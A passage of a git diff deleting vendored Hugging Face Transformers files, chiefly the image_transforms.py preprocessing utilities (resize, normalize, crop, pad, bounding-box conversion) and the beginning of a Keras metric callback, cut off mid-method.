FlaxGreedySearchOutput, FlaxSampleOutput -else: - import sys - - sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__) diff --git a/spaces/chendl/compositional_test/transformers/src/transformers/image_transforms.py b/spaces/chendl/compositional_test/transformers/src/transformers/image_transforms.py deleted file mode 100644 index 369ddc8d4c0057de0c0bb9dbc46f2d5b86f85ed7..0000000000000000000000000000000000000000 --- a/spaces/chendl/compositional_test/transformers/src/transformers/image_transforms.py +++ /dev/null @@ -1,744 +0,0 @@ -# coding=utf-8 -# Copyright 2022 The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -import warnings -from typing import Iterable, List, Optional, Tuple, Union - -import numpy as np - -from .image_utils import ( - ChannelDimension, - ImageInput, - get_channel_dimension_axis, - get_image_size, - infer_channel_dimension_format, - to_numpy_array, -) -from .utils import ExplicitEnum, TensorType, is_jax_tensor, is_tf_tensor, is_torch_tensor -from .utils.import_utils import ( - is_flax_available, - is_tf_available, - is_torch_available, - is_vision_available, - requires_backends, -) - - -if is_vision_available(): - import PIL - - from .image_utils import PILImageResampling - -if is_torch_available(): - import torch - -if is_tf_available(): - import tensorflow as tf - -if is_flax_available(): - import jax.numpy as jnp - - -def to_channel_dimension_format( - image: np.ndarray, - channel_dim: Union[ChannelDimension, str], - input_channel_dim: Optional[Union[ChannelDimension, str]] = None, -) -> np.ndarray: - """ - Converts `image` to the channel dimension format specified by `channel_dim`. - - Args: - image (`numpy.ndarray`): - The image to have its channel dimension set. - channel_dim (`ChannelDimension`): - The channel dimension format to use. - - Returns: - `np.ndarray`: The image with the channel dimension set to `channel_dim`. - """ - if not isinstance(image, np.ndarray): - raise ValueError(f"Input image must be of type np.ndarray, got {type(image)}") - - if input_channel_dim is None: - input_channel_dim = infer_channel_dimension_format(image) - - target_channel_dim = ChannelDimension(channel_dim) - if input_channel_dim == target_channel_dim: - return image - - if target_channel_dim == ChannelDimension.FIRST: - image = image.transpose((2, 0, 1)) - elif target_channel_dim == ChannelDimension.LAST: - image = image.transpose((1, 2, 0)) - else: - raise ValueError("Unsupported channel dimension format: {}".format(channel_dim)) - - return image - - -def rescale( - image: np.ndarray, scale: float, data_format: Optional[ChannelDimension] = None, dtype=np.float32 -) -> np.ndarray: - """ - Rescales `image` by `scale`. - - Args: - image (`np.ndarray`): - The image to rescale. - scale (`float`): - The scale to use for rescaling the image. - data_format (`ChannelDimension`, *optional*): - The channel dimension format of the image. If not provided, it will be the same as the input image. - dtype (`np.dtype`, *optional*, defaults to `np.float32`): - The dtype of the output image. Defaults to `np.float32`. Used for backwards compatibility with feature - extractors. - - Returns: - `np.ndarray`: The rescaled image. - """ - if not isinstance(image, np.ndarray): - raise ValueError(f"Input image must be of type np.ndarray, got {type(image)}") - - rescaled_image = image * scale - if data_format is not None: - rescaled_image = to_channel_dimension_format(rescaled_image, data_format) - rescaled_image = rescaled_image.astype(dtype) - return rescaled_image - - -def _rescale_for_pil_conversion(image): - """ - Detects whether or not the image needs to be rescaled before being converted to a PIL image. - - The assumption is that if the image is of type `np.float` and all values are between 0 and 1, it needs to be - rescaled. - """ - if image.dtype == np.uint8: - do_rescale = False - elif np.allclose(image, image.astype(int)): - if np.all(0 <= image) and np.all(image <= 255): - do_rescale = False - else: - raise ValueError( - "The image to be converted to a PIL image contains values outside the range [0, 255], " - f"got [{image.min()}, {image.max()}] which cannot be converted to uint8." - ) - elif np.all(0 <= image) and np.all(image <= 1): - do_rescale = True - else: - raise ValueError( - "The image to be converted to a PIL image contains values outside the range [0, 1], " - f"got [{image.min()}, {image.max()}] which cannot be converted to uint8." - ) - return do_rescale - - -def to_pil_image( - image: Union[np.ndarray, "PIL.Image.Image", "torch.Tensor", "tf.Tensor", "jnp.ndarray"], - do_rescale: Optional[bool] = None, -) -> "PIL.Image.Image": - """ - Converts `image` to a PIL Image. Optionally rescales it and puts the channel dimension back as the last axis if - needed. - - Args: - image (`PIL.Image.Image` or `numpy.ndarray` or `torch.Tensor` or `tf.Tensor`): - The image to convert to the `PIL.Image` format. - do_rescale (`bool`, *optional*): - Whether or not to apply the scaling factor (to make pixel values integers between 0 and 255). Will default - to `True` if the image type is a floating type and casting to `int` would result in a loss of precision, - and `False` otherwise. - - Returns: - `PIL.Image.Image`: The converted image. - """ - requires_backends(to_pil_image, ["vision"]) - - if isinstance(image, PIL.Image.Image): - return image - - # Convert all tensors to numpy arrays before converting to PIL image - if is_torch_tensor(image) or is_tf_tensor(image): - image = image.numpy() - elif is_jax_tensor(image): - image = np.array(image) - elif not isinstance(image, np.ndarray): - raise ValueError("Input image type not supported: {}".format(type(image))) - - # If the channel as been moved to first dim, we put it back at the end. - image = to_channel_dimension_format(image, ChannelDimension.LAST) - - # If there is a single channel, we squeeze it, as otherwise PIL can't handle it. - image = np.squeeze(image, axis=-1) if image.shape[-1] == 1 else image - - # PIL.Image can only store uint8 values so we rescale the image to be between 0 and 255 if needed. - do_rescale = _rescale_for_pil_conversion(image) if do_rescale is None else do_rescale - - if do_rescale: - image = rescale(image, 255) - - image = image.astype(np.uint8) - return PIL.Image.fromarray(image) - - -# Logic adapted from torchvision resizing logic: https://github.com/pytorch/vision/blob/511924c1ced4ce0461197e5caa64ce5b9e558aab/torchvision/transforms/functional.py#L366 -def get_resize_output_image_size( - input_image: np.ndarray, - size: Union[int, Tuple[int, int], List[int], Tuple[int]], - default_to_square: bool = True, - max_size: Optional[int] = None, -) -> tuple: - """ - Find the target (height, width) dimension of the output image after resizing given the input image and the desired - size. - - Args: - input_image (`np.ndarray`): - The image to resize. - size (`int` or `Tuple[int, int]` or List[int] or Tuple[int]): - The size to use for resizing the image. If `size` is a sequence like (h, w), output size will be matched to - this. - - If `size` is an int and `default_to_square` is `True`, then image will be resized to (size, size). If - `size` is an int and `default_to_square` is `False`, then smaller edge of the image will be matched to this - number. i.e, if height > width, then image will be rescaled to (size * height / width, size). - default_to_square (`bool`, *optional*, defaults to `True`): - How to convert `size` when it is a single int. If set to `True`, the `size` will be converted to a square - (`size`,`size`). If set to `False`, will replicate - [`torchvision.transforms.Resize`](https://pytorch.org/vision/stable/transforms.html#torchvision.transforms.Resize) - with support for resizing only the smallest edge and providing an optional `max_size`. - max_size (`int`, *optional*): - The maximum allowed for the longer edge of the resized image: if the longer edge of the image is greater - than `max_size` after being resized according to `size`, then the image is resized again so that the longer - edge is equal to `max_size`. As a result, `size` might be overruled, i.e the smaller edge may be shorter - than `size`. Only used if `default_to_square` is `False`. - - Returns: - `tuple`: The target (height, width) dimension of the output image after resizing. - """ - if isinstance(size, (tuple, list)): - if len(size) == 2: - return tuple(size) - elif len(size) == 1: - # Perform same logic as if size was an int - size = size[0] - else: - raise ValueError("size must have 1 or 2 elements if it is a list or tuple") - - if default_to_square: - return (size, size) - - height, width = get_image_size(input_image) - short, long = (width, height) if width <= height else (height, width) - requested_new_short = size - - new_short, new_long = requested_new_short, int(requested_new_short * long / short) - - if max_size is not None: - if max_size <= requested_new_short: - raise ValueError( - f"max_size = {max_size} must be strictly greater than the requested " - f"size for the smaller edge size = {size}" - ) - if new_long > max_size: - new_short, new_long = int(max_size * new_short / new_long), max_size - - return (new_long, new_short) if width <= height else (new_short, new_long) - - -def resize( - image, - size: Tuple[int, int], - resample: "PILImageResampling" = None, - reducing_gap: Optional[int] = None, - data_format: Optional[ChannelDimension] = None, - return_numpy: bool = True, -) -> np.ndarray: - """ - Resizes `image` to `(height, width)` specified by `size` using the PIL library. - - Args: - image (`PIL.Image.Image` or `np.ndarray` or `torch.Tensor`): - The image to resize. - size (`Tuple[int, int]`): - The size to use for resizing the image. - resample (`int`, *optional*, defaults to `PILImageResampling.BILINEAR`): - The filter to user for resampling. - reducing_gap (`int`, *optional*): - Apply optimization by resizing the image in two steps. The bigger `reducing_gap`, the closer the result to - the fair resampling. See corresponding Pillow documentation for more details. - data_format (`ChannelDimension`, *optional*): - The channel dimension format of the output image. If unset, will use the inferred format from the input. - return_numpy (`bool`, *optional*, defaults to `True`): - Whether or not to return the resized image as a numpy array. If False a `PIL.Image.Image` object is - returned. - - Returns: - `np.ndarray`: The resized image. - """ - requires_backends(resize, ["vision"]) - - resample = resample if resample is not None else PILImageResampling.BILINEAR - - if not len(size) == 2: - raise ValueError("size must have 2 elements") - - # For all transformations, we want to keep the same data format as the input image unless otherwise specified. - # The resized image from PIL will always have channels last, so find the input format first. - data_format = infer_channel_dimension_format(image) if data_format is None else data_format - - # To maintain backwards compatibility with the resizing done in previous image feature extractors, we use - # the pillow library to resize the image and then convert back to numpy - do_rescale = False - if not isinstance(image, PIL.Image.Image): - do_rescale = _rescale_for_pil_conversion(image) - image = to_pil_image(image, do_rescale=do_rescale) - height, width = size - # PIL images are in the format (width, height) - resized_image = image.resize((width, height), resample=resample, reducing_gap=reducing_gap) - - if return_numpy: - resized_image = np.array(resized_image) - # If the input image channel dimension was of size 1, then it is dropped when converting to a PIL image - # so we need to add it back if necessary. - resized_image = np.expand_dims(resized_image, axis=-1) if resized_image.ndim == 2 else resized_image - # The image is always in channels last format after converting from a PIL image - resized_image = to_channel_dimension_format( - resized_image, data_format, input_channel_dim=ChannelDimension.LAST - ) - # If an image was rescaled to be in the range [0, 255] before converting to a PIL image, then we need to - # rescale it back to the original range. - resized_image = rescale(resized_image, 1 / 255) if do_rescale else resized_image - return resized_image - - -def normalize( - image: np.ndarray, - mean: Union[float, Iterable[float]], - std: Union[float, Iterable[float]], - data_format: Optional[ChannelDimension] = None, -) -> np.ndarray: - """ - Normalizes `image` using the mean and standard deviation specified by `mean` and `std`. - - image = (image - mean) / std - - Args: - image (`np.ndarray`): - The image to normalize. - mean (`float` or `Iterable[float]`): - The mean to use for normalization. - std (`float` or `Iterable[float]`): - The standard deviation to use for normalization. - data_format (`ChannelDimension`, *optional*): - The channel dimension format of the output image. If unset, will use the inferred format from the input. - """ - requires_backends(normalize, ["vision"]) - - if isinstance(image, PIL.Image.Image): - warnings.warn( - "PIL.Image.Image inputs are deprecated and will be removed in v4.26.0. Please use numpy arrays instead.", - FutureWarning, - ) - # Convert PIL image to numpy array with the same logic as in the previous feature extractor normalize - - # casting to numpy array and dividing by 255. - image = to_numpy_array(image) - image = rescale(image, scale=1 / 255) - - if not isinstance(image, np.ndarray): - raise ValueError("image must be a numpy array") - - input_data_format = infer_channel_dimension_format(image) - channel_axis = get_channel_dimension_axis(image) - num_channels = image.shape[channel_axis] - - if isinstance(mean, Iterable): - if len(mean) != num_channels: - raise ValueError(f"mean must have {num_channels} elements if it is an iterable, got {len(mean)}") - else: - mean = [mean] * num_channels - mean = np.array(mean, dtype=image.dtype) - - if isinstance(std, Iterable): - if len(std) != num_channels: - raise ValueError(f"std must have {num_channels} elements if it is an iterable, got {len(std)}") - else: - std = [std] * num_channels - std = np.array(std, dtype=image.dtype) - - if input_data_format == ChannelDimension.LAST: - image = (image - mean) / std - else: - image = ((image.T - mean) / std).T - - image = to_channel_dimension_format(image, data_format) if data_format is not None else image - return image - - -def center_crop( - image: np.ndarray, - size: Tuple[int, int], - data_format: Optional[Union[str, ChannelDimension]] = None, - return_numpy: Optional[bool] = None, -) -> np.ndarray: - """ - Crops the `image` to the specified `size` using a center crop. Note that if the image is too small to be cropped to - the size given, it will be padded (so the returned result will always be of size `size`). - - Args: - image (`np.ndarray`): - The image to crop. - size (`Tuple[int, int]`): - The target size for the cropped image. - data_format (`str` or `ChannelDimension`, *optional*): - The channel dimension format for the output image. Can be one of: - - `"channels_first"` or `ChannelDimension.FIRST`: image in (num_channels, height, width) format. - - `"channels_last"` or `ChannelDimension.LAST`: image in (height, width, num_channels) format. - If unset, will use the inferred format of the input image. - return_numpy (`bool`, *optional*): - Whether or not to return the cropped image as a numpy array. Used for backwards compatibility with the - previous ImageFeatureExtractionMixin method. - - Unset: will return the same type as the input image. - - `True`: will return a numpy array. - - `False`: will return a `PIL.Image.Image` object. - Returns: - `np.ndarray`: The cropped image. - """ - requires_backends(center_crop, ["vision"]) - - if isinstance(image, PIL.Image.Image): - warnings.warn( - "PIL.Image.Image inputs are deprecated and will be removed in v4.26.0. Please use numpy arrays instead.", - FutureWarning, - ) - image = to_numpy_array(image) - return_numpy = False if return_numpy is None else return_numpy - else: - return_numpy = True if return_numpy is None else return_numpy - - if not isinstance(image, np.ndarray): - raise ValueError(f"Input image must be of type np.ndarray, got {type(image)}") - - if not isinstance(size, Iterable) or len(size) != 2: - raise ValueError("size must have 2 elements representing the height and width of the output image") - - input_data_format = infer_channel_dimension_format(image) - output_data_format = data_format if data_format is not None else input_data_format - - # We perform the crop in (C, H, W) format and then convert to the output format - image = to_channel_dimension_format(image, ChannelDimension.FIRST) - - orig_height, orig_width = get_image_size(image) - crop_height, crop_width = size - crop_height, crop_width = int(crop_height), int(crop_width) - - # In case size is odd, (image_shape[0] + size[0]) // 2 won't give the proper result. - top = (orig_height - crop_height) // 2 - bottom = top + crop_height - # In case size is odd, (image_shape[1] + size[1]) // 2 won't give the proper result. - left = (orig_width - crop_width) // 2 - right = left + crop_width - - # Check if cropped area is within image boundaries - if top >= 0 and bottom <= orig_height and left >= 0 and right <= orig_width: - image = image[..., top:bottom, left:right] - image = to_channel_dimension_format(image, output_data_format) - return image - - # Otherwise, we may need to pad if the image is too small. Oh joy... - new_height = max(crop_height, orig_height) - new_width = max(crop_width, orig_width) - new_shape = image.shape[:-2] + (new_height, new_width) - new_image = np.zeros_like(image, shape=new_shape) - - # If the image is too small, pad it with zeros - top_pad = (new_height - orig_height) // 2 - bottom_pad = top_pad + orig_height - left_pad = (new_width - orig_width) // 2 - right_pad = left_pad + orig_width - new_image[..., top_pad:bottom_pad, left_pad:right_pad] = image - - top += top_pad - bottom += top_pad - left += left_pad - right += left_pad - - new_image = new_image[..., max(0, top) : min(new_height, bottom), max(0, left) : min(new_width, right)] - new_image = to_channel_dimension_format(new_image, output_data_format) - - if not return_numpy: - new_image = to_pil_image(new_image) - - return new_image - - -def _center_to_corners_format_torch(bboxes_center: "torch.Tensor") -> "torch.Tensor": - center_x, center_y, width, height = bboxes_center.unbind(-1) - bbox_corners = torch.stack( - # top left x, top left y, bottom right x, bottom right y - [(center_x - 0.5 * width), (center_y - 0.5 * height), (center_x + 0.5 * width), (center_y + 0.5 * height)], - dim=-1, - ) - return bbox_corners - - -def _center_to_corners_format_numpy(bboxes_center: np.ndarray) -> np.ndarray: - center_x, center_y, width, height = bboxes_center.T - bboxes_corners = np.stack( - # top left x, top left y, bottom right x, bottom right y - [center_x - 0.5 * width, center_y - 0.5 * height, center_x + 0.5 * width, center_y + 0.5 * height], - axis=-1, - ) - return bboxes_corners - - -def _center_to_corners_format_tf(bboxes_center: "tf.Tensor") -> "tf.Tensor": - center_x, center_y, width, height = tf.unstack(bboxes_center, axis=-1) - bboxes_corners = tf.stack( - # top left x, top left y, bottom right x, bottom right y - [center_x - 0.5 * width, center_y - 0.5 * height, center_x + 0.5 * width, center_y + 0.5 * height], - axis=-1, - ) - return bboxes_corners - - -# 2 functions below inspired by https://github.com/facebookresearch/detr/blob/master/util/box_ops.py -def center_to_corners_format(bboxes_center: TensorType) -> TensorType: - """ - Converts bounding boxes from center format to corners format. - - center format: contains the coordinate for the center of the box and its width, height dimensions - (center_x, center_y, width, height) - corners format: contains the coodinates for the top-left and bottom-right corners of the box - (top_left_x, top_left_y, bottom_right_x, bottom_right_y) - """ - # Function is used during model forward pass, so we use the input framework if possible, without - # converting to numpy - if is_torch_tensor(bboxes_center): - return _center_to_corners_format_torch(bboxes_center) - elif isinstance(bboxes_center, np.ndarray): - return _center_to_corners_format_numpy(bboxes_center) - elif is_tf_tensor(bboxes_center): - return _center_to_corners_format_tf(bboxes_center) - - raise ValueError(f"Unsupported input type {type(bboxes_center)}") - - -def _corners_to_center_format_torch(bboxes_corners: "torch.Tensor") -> "torch.Tensor": - top_left_x, top_left_y, bottom_right_x, bottom_right_y = bboxes_corners.unbind(-1) - b = [ - (top_left_x + bottom_right_x) / 2, # center x - (top_left_y + bottom_right_y) / 2, # center y - (bottom_right_x - top_left_x), # width - (bottom_right_y - top_left_y), # height - ] - return torch.stack(b, dim=-1) - - -def _corners_to_center_format_numpy(bboxes_corners: np.ndarray) -> np.ndarray: - top_left_x, top_left_y, bottom_right_x, bottom_right_y = bboxes_corners.T - bboxes_center = np.stack( - [ - (top_left_x + bottom_right_x) / 2, # center x - (top_left_y + bottom_right_y) / 2, # center y - (bottom_right_x - top_left_x), # width - (bottom_right_y - top_left_y), # height - ], - axis=-1, - ) - return bboxes_center - - -def _corners_to_center_format_tf(bboxes_corners: "tf.Tensor") -> "tf.Tensor": - top_left_x, top_left_y, bottom_right_x, bottom_right_y = tf.unstack(bboxes_corners, axis=-1) - bboxes_center = tf.stack( - [ - (top_left_x + bottom_right_x) / 2, # center x - (top_left_y + bottom_right_y) / 2, # center y - (bottom_right_x - top_left_x), # width - (bottom_right_y - top_left_y), # height - ], - axis=-1, - ) - return bboxes_center - - -def corners_to_center_format(bboxes_corners: TensorType) -> TensorType: - """ - Converts bounding boxes from corners format to center format. - - corners format: contains the coodinates for the top-left and bottom-right corners of the box - (top_left_x, top_left_y, bottom_right_x, bottom_right_y) - center format: contains the coordinate for the center of the box and its the width, height dimensions - (center_x, center_y, width, height) - """ - # Inverse function accepts different input types so implemented here too - if is_torch_tensor(bboxes_corners): - return _corners_to_center_format_torch(bboxes_corners) - elif isinstance(bboxes_corners, np.ndarray): - return _corners_to_center_format_numpy(bboxes_corners) - elif is_tf_tensor(bboxes_corners): - return _corners_to_center_format_tf(bboxes_corners) - - raise ValueError(f"Unsupported input type {type(bboxes_corners)}") - - -# 2 functions below copied from https://github.com/cocodataset/panopticapi/blob/master/panopticapi/utils.py -# Copyright (c) 2018, Alexander Kirillov -# All rights reserved. -def rgb_to_id(color): - """ - Converts RGB color to unique ID. - """ - if isinstance(color, np.ndarray) and len(color.shape) == 3: - if color.dtype == np.uint8: - color = color.astype(np.int32) - return color[:, :, 0] + 256 * color[:, :, 1] + 256 * 256 * color[:, :, 2] - return int(color[0] + 256 * color[1] + 256 * 256 * color[2]) - - -def id_to_rgb(id_map): - """ - Converts unique ID to RGB color. - """ - if isinstance(id_map, np.ndarray): - id_map_copy = id_map.copy() - rgb_shape = tuple(list(id_map.shape) + [3]) - rgb_map = np.zeros(rgb_shape, dtype=np.uint8) - for i in range(3): - rgb_map[..., i] = id_map_copy % 256 - id_map_copy //= 256 - return rgb_map - color = [] - for _ in range(3): - color.append(id_map % 256) - id_map //= 256 - return color - - -class PaddingMode(ExplicitEnum): - """ - Enum class for the different padding modes to use when padding images. - """ - - CONSTANT = "constant" - REFLECT = "reflect" - REPLICATE = "replicate" - SYMMETRIC = "symmetric" - - -def pad( - image: np.ndarray, - padding: Union[int, Tuple[int, int], Iterable[Tuple[int, int]]], - mode: PaddingMode = PaddingMode.CONSTANT, - constant_values: Union[float, Iterable[float]] = 0.0, - data_format: Optional[Union[str, ChannelDimension]] = None, - input_data_format: Optional[Union[str, ChannelDimension]] = None, -) -> np.ndarray: - """ - Pads the `image` with the specified (height, width) `padding` and `mode`. - - Args: - image (`np.ndarray`): - The image to pad. - padding (`int` or `Tuple[int, int]` or `Iterable[Tuple[int, int]]`): - Padding to apply to the edges of the height, width axes. Can be one of three formats: - - `((before_height, after_height), (before_width, after_width))` unique pad widths for each axis. - - `((before, after),)` yields same before and after pad for height and width. - - `(pad,)` or int is a shortcut for before = after = pad width for all axes. - mode (`PaddingMode`): - The padding mode to use. Can be one of: - - `"constant"`: pads with a constant value. - - `"reflect"`: pads with the reflection of the vector mirrored on the first and last values of the - vector along each axis. - - `"replicate"`: pads with the replication of the last value on the edge of the array along each axis. - - `"symmetric"`: pads with the reflection of the vector mirrored along the edge of the array. - constant_values (`float` or `Iterable[float]`, *optional*): - The value to use for the padding if `mode` is `"constant"`. - data_format (`str` or `ChannelDimension`, *optional*): - The channel dimension format for the output image. Can be one of: - - `"channels_first"` or `ChannelDimension.FIRST`: image in (num_channels, height, width) format. - - `"channels_last"` or `ChannelDimension.LAST`: image in (height, width, num_channels) format. - If unset, will use same as the input image. - input_data_format (`str` or `ChannelDimension`, *optional*): - The channel dimension format for the input image. Can be one of: - - `"channels_first"` or `ChannelDimension.FIRST`: image in (num_channels, height, width) format. - - `"channels_last"` or `ChannelDimension.LAST`: image in (height, width, num_channels) format. - If unset, will use the inferred format of the input image. - - Returns: - `np.ndarray`: The padded image. - - """ - if input_data_format is None: - input_data_format = infer_channel_dimension_format(image) - - def _expand_for_data_format(values): - """ - Convert values to be in the format expected by np.pad based on the data format. - """ - if isinstance(values, (int, float)): - values = ((values, values), (values, values)) - elif isinstance(values, tuple) and len(values) == 1: - values = ((values[0], values[0]), (values[0], values[0])) - elif isinstance(values, tuple) and len(values) == 2 and isinstance(values[0], int): - values = (values, values) - elif isinstance(values, tuple) and len(values) == 2 and isinstance(values[0], tuple): - values = values - else: - raise ValueError(f"Unsupported format: {values}") - - # add 0 for channel dimension - values = ((0, 0), *values) if input_data_format == ChannelDimension.FIRST else (*values, (0, 0)) - - # Add additional padding if there's a batch dimension - values = (0, *values) if image.ndim == 4 else values - return values - - padding = _expand_for_data_format(padding) - - if mode == PaddingMode.CONSTANT: - constant_values = _expand_for_data_format(constant_values) - image = np.pad(image, padding, mode="constant", constant_values=constant_values) - elif mode == PaddingMode.REFLECT: - image = np.pad(image, padding, mode="reflect") - elif mode == PaddingMode.REPLICATE: - image = np.pad(image, padding, mode="edge") - elif mode == PaddingMode.SYMMETRIC: - image = np.pad(image, padding, mode="symmetric") - else: - raise ValueError(f"Invalid padding mode: {mode}") - - image = to_channel_dimension_format(image, data_format) if data_format is not None else image - return image - - -# TODO (Amy): Accept 1/3/4 channel numpy array as input and return np.array as default -def convert_to_rgb(image: ImageInput) -> ImageInput: - """ - Converts an image to RGB format. Only converts if the image is of type PIL.Image.Image, otherwise returns the image - as is. - - Args: - image (Image): - The image to convert. - """ - requires_backends(convert_to_rgb, ["vision"]) - - if not isinstance(image, PIL.Image.Image): - return image - - image = image.convert("RGB") - return image diff --git a/spaces/chendl/compositional_test/transformers/src/transformers/keras_callbacks.py b/spaces/chendl/compositional_test/transformers/src/transformers/keras_callbacks.py deleted file mode 100644 index a9d75c9aeeaa7f58997f18f80ded709c23af4d4e..0000000000000000000000000000000000000000 --- a/spaces/chendl/compositional_test/transformers/src/transformers/keras_callbacks.py +++ /dev/null @@ -1,414 +0,0 @@ -import logging -import os -from pathlib import Path -from time import sleep -from typing import Callable, List, Optional, Union - -import numpy as np -import tensorflow as tf -from huggingface_hub import Repository, create_repo -from packaging.version import parse -from tensorflow.keras.callbacks import Callback - -from . import IntervalStrategy, PreTrainedTokenizerBase -from .modelcard import TrainingSummary -from .utils import get_full_repo_name - - -logger = logging.getLogger(__name__) - - -class KerasMetricCallback(Callback): - """ - Callback to compute metrics at the end of every epoch. Unlike normal Keras metrics, these do not need to be - compilable by TF. It is particularly useful for common NLP metrics like BLEU and ROUGE that require string - operations or generation loops that cannot be compiled. Predictions (or generations) will be computed on the - `eval_dataset` before being passed to the `metric_fn` in `np.ndarray` format. The `metric_fn` should compute - metrics and return a dict mapping metric names to metric values. - - We provide an example of a suitable metric_fn that computes ROUGE scores for a summarization model below. Note that - this example skips some post-processing for readability and simplicity, and should probably not be used as-is! - - ```py - from datasets import load_metric - - rouge_metric = load_metric("rouge") - - - def rouge_fn(predictions, labels): - decoded_predictions = tokenizer.batch_decode(predictions, skip_special_tokens=True) - decoded_labels = tokenizer.batch_decode(labels, skip_special_tokens=True) - result = rouge_metric.compute(predictions=decoded_predictions, references=decoded_labels) - return {key: value.mid.fmeasure * 100 for key, value in result.items()} - ``` - - The above function will return a dict containing values which will be logged like any other Keras metric: - - ``` - {'rouge1': 37.4199, 'rouge2': 13.9768, 'rougeL': 34.361, 'rougeLsum': 35.0781 - ``` - - Args: - metric_fn (`Callable`): - Metric function provided by the user. It will be called with two arguments - `predictions` and `labels`. - These contain the model's outputs and matching labels from the dataset. It should return a dict mapping - metric names to numerical values. - eval_dataset (`tf.data.Dataset` or `dict` or `tuple` or `np.ndarray` or `tf.Tensor`): - Validation data to be used to generate predictions for the `metric_fn`. - output_cols (`List[str], *optional*): - A list of columns to be retained from the model output as the predictions. Defaults to all. - label_cols ('`List[str]`, *optional*'): - A list of columns to be retained from the input dataset as the labels. Will be autodetected if this is not - supplied. - batch_size (`int`, *optional*): - Batch size. Only used when the data is not a pre-batched `tf.data.Dataset`. - predict_with_generate (`bool`, *optional*, defaults to `False`): - Whether we should use `model.generate()` to get outputs for the model. - use_xla_generation (`bool`, *optional*, defaults to `False`): - If we're generating, whether to compile model generation with XLA. This can massively increase the speed of - generation (up to 100X speedup) but will require a new XLA compilation for each input shape. When using XLA - generation, it's a good idea to pad your inputs to the same size, or to use the `pad_to_multiple_of` - argument in your `tokenizer` or `DataCollator`, which will reduce the number of unique input shapes and - save a lot of compilation time. This option has no effect is `predict_with_generate` is `False`. - generate_kwargs (`dict`, *optional*): - Keyword arguments to pass to `model.generate()` when generating. Has no effect if `predict_with_generate` - is `False`. - - """ - - def __init__( - self, - metric_fn: Callable, - eval_dataset: Union[tf.data.Dataset, np.ndarray, tf.Tensor, tuple, dict], - output_cols: Optional[List[str]] = None, - label_cols: Optional[List[str]] = None, - batch_size: Optional[int] = None, - predict_with_generate: bool = False, - use_xla_generation: bool = False, - generate_kwargs: Optional[dict] = None, - ): - super().__init__() - self.metric_fn = metric_fn - self.batch_size = batch_size - if not isinstance(eval_dataset, tf.data.Dataset): - if batch_size is None: - raise ValueError( - "When passing data to KerasMetricCallback that is not a pre-batched tf.data.Dataset " - "the batch_size argument must be set." - ) - # Wrap a tf.data.Dataset around it - eval_dataset = tf.data.Dataset.from_tensor_slices(eval_dataset).batch(batch_size, drop_remainder=False) - self.eval_dataset = eval_dataset - self.predict_with_generate = predict_with_generate - self.output_cols = output_cols - - # This next block attempts to parse out which elements of the dataset should be appended to the labels list - # that is passed to the metric_fn - if isinstance(eval_dataset.element_spec, tuple) and len(eval_dataset.element_spec) == 2: - input_spec, label_spec = eval_dataset.element_spec - else: - input_spec = eval_dataset.element_spec - label_spec = None - if label_cols is not None: - for label in label_cols: - if label not in input_spec: - raise ValueError(f"Label {label} is in label_cols but could not be found in the dataset inputs!") - self.label_cols = label_cols - self.use_keras_label = False - elif label_spec is not None: - # If the dataset inputs are split into a 2-tuple of inputs and labels, - # assume the second element is the labels - self.label_cols = None - self.use_keras_label = True - elif "labels" in input_spec: - self.label_cols = ["labels"] - self.use_keras_label = False - logging.warning("No label_cols specified for KerasMetricCallback, assuming you want the 'labels' key.") - elif "start_positions" in input_spec and "end_positions" in input_spec: - self.label_cols = ["start_positions", "end_positions"] - self.use_keras_label = False - logging.warning( - "No label_cols specified for KerasMetricCallback, assuming you want the " - "start_positions and end_positions keys." - ) - else: - raise ValueError("Could not autodetect label_cols for KerasMetricCallback, please specify them!") - if parse(tf.__version__) < parse("2.7"): - logging.warning("TF versions less than 2.7 may encounter issues with KerasMetricCallback!") - - self.use_xla_generation = use_xla_generation - self.generate_kwargs = {} if generate_kwargs is None else generate_kwargs - - self.generation_function = None - - @staticmethod - def _concatenate_batches(batches, padding_index=-100): - # If all batches are unidimensional or same length, do a simple concatenation - if batches[0].ndim == 1 or all([batch.shape[1] == batches[0].shape[1] for batch in batches]): - return np.concatenate(batches, axis=0) - - # Welp, they're not the same length. Let's do some padding - max_len = max([batch.shape[1] for batch in batches]) - num_samples = sum([batch.shape[0] for batch in batches]) - output = np.full_like( - batches[0], fill_value=padding_index, shape=[num_samples, max_len] + list(batches[0].shape[2:]) - ) - # i keeps track of which part of the concatenated array we're writing the next batch to - i = 0 - for batch in batches: - output[i : i + len(batch), : batch.shape[1]] = batch - i += len(batch) - return output - - def _postprocess_predictions_or_labels(self, inputs): - if isinstance(inputs[0], dict): - outputs = {} - for key in inputs[0].keys(): - outputs[key] = self._concatenate_batches([batch[key] for batch in inputs]) - # If it's a dict with only one key, just return the array - if len(outputs) == 1: - outputs = list(outputs.values())[0] - elif isinstance(inputs[0], list) or isinstance(inputs[0], tuple): - outputs = [] - for input_list in zip(*inputs): - outputs.append(self._concatenate_batches(input_list)) - if len(outputs) == 1: - outputs = outputs[0] # If it's a list with only one element, just return the array - elif isinstance(inputs[0], np.ndarray): - outputs = self._concatenate_batches(inputs) - elif isinstance(inputs[0], tf.Tensor): - outputs = self._concatenate_batches([tensor.numpy() for tensor in inputs]) - else: - raise TypeError(f"Couldn't handle batch of type {type(inputs[0])}!") - return outputs - - def on_epoch_end(self, epoch, logs=None): - if hasattr(self.model, "config"): - ignore_keys = getattr(self.model.config, "keys_to_ignore_at_inference", []) - else: - ignore_keys = [] - - main_input_name = None - if self.predict_with_generate: - # This dense conditional recognizes the case where we have an encoder-decoder model, but - # avoids getting tangled up when we just have a model with a layer called 'encoder' - if hasattr(self.model, "encoder") and hasattr(self.model.encoder, "main_input_name"): - if self.model.encoder.main_input_name != self.model.main_input_name: - main_input_name = self.model.encoder.main_input_name - else: - main_input_name = getattr(self.model, "main_input_name", "input_ids") - - if self.use_xla_generation and self.generation_function is None: - - def generation_function(inputs, attention_mask): - return self.model.generate(inputs, attention_mask=attention_mask, **self.generate_kwargs) - - self.generation_function = tf.function(generation_function, jit_compile=True) - - prediction_list = [] - label_list = [] - - # The whole 